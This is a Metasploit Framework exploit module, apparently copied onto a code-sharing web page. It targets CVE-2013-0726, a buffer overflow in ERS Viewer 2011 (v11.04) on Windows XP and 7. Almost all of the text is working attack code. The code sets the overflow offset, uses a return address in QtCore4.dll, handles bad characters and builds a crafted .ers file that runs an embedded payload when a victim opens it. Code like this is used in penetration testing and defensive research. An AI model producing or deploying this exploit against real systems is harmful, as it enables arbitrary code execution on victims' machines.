扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "ERS Viewer 2011 ERS File Handling Buffer Overflow", 'Description'=> %q{ This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the function ERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Parvez Anwar', # Vulnerability Discovery 'juan vazquez' # Metasploit ], 'References' => [ [ 'CVE', '2013-0726' ], [ 'OSVDB', '92694' ], [ 'BID', '59379' ], [ 'URL', 'http://secunia.com/advisories/51725/' ] ], 'Payload'=> { 'Space'=> 7516, 'BadChars' => "\x22\x5c" + (0x7f..0xff).to_a.pack("C*") + (0x00..0x08).to_a.pack("C*") + (0x0a..0x1f).to_a.pack("C*"), 'DisableNops' => true, 'EncoderOptions' => { 'BufferRegister' => 'ESP' } }, 'SaveRegisters'=> [ 'ESP' ], 'DefaultOptions'=> { 'ExitFunction' => "process", }, 'Platform' => 'win', 'Targets'=> [ [ 'ERS Viewer 2011 (v11.04)/ Windows XP SP3 / Windows 7 SP1', { 'Offset' => 260, 'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll } ], ], 'Privileged' => false, 'DisclosureDate' => "Apr 23 2013", 'DefaultTarget'=> 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.','msf.ers']), ], self.class) end # Rewrote it because make_nops is ignoring SaveRegisters # and corrupting ESP. def make_nops(count) return "\x43" * count # 0x43 => inc ebx end def exploit buf = rand_text(target['Offset']) buf << [target.ret].pack("V") buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode buf << payload.encoded ers = %Q| DatasetHeader Begin Name= "#{buf}" DatasetHeader End | file_create(ers) end end |
体验盒子
